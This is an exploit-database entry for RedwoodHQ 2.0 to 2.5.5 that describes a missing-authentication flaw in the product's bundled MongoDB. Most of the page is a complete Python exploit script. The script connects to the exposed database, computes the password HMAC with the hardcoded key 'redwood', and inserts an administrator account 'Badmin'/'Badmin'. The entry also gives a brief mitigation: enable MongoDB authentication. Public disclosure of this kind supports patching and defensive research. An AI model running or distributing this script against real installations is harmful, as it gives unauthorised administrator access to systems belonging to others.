RedxploitHQ (Create Admin User by missing authentication on db)

vendor:

RedwoodHQ

by:

EthicalHCOP

8.8

CVSS

HIGH

Missing Authentication

287

CWE

Product Name: RedwoodHQ

Affected Version From: 2.0

Affected Version To: 2.5.5

Patch Exists: YES

Related CWE: N/A

CPE: a:redwoodhq:redwoodhq

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu and Windows

2019

RedxploitHQ (Create Admin User by missing authentication on db)

RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have her own Mongo Launcher. The problem is that this vendor database doesn't require any authentication to read her data. So, an attacker can use the same syntax that the Framework uses to create an admin user on the database and access the tool.

Mitigation:

Ensure that authentication is enabled for MongoDB databases.

Source

Exploit-DB raw data:

# -*- encoding: utf-8 -*-
#!/usr/bin/python3

# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
# Date: 	       14-june-2019
# Exploit Author:  EthicalHCOP
# Version: 	       2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link:   https://redwoodhq.com/redwood-download/
# Tested on: 	   Ubuntu and Windows.
# Twitter:	       @EthicalHcop
# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description: 	   Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
# 
# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have  her own Mongo Launcher. 
# The problem is that this vendor database doesn't require any authentication to read her data. 
# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
# 
# POC:             https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
    message = bytes(Pass,encoding='utf8')
    secret = bytes('redwood',encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())

def DbConnect(ip,port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con

def DbDisconnect(con):
    con.close()

def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)

def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
    start()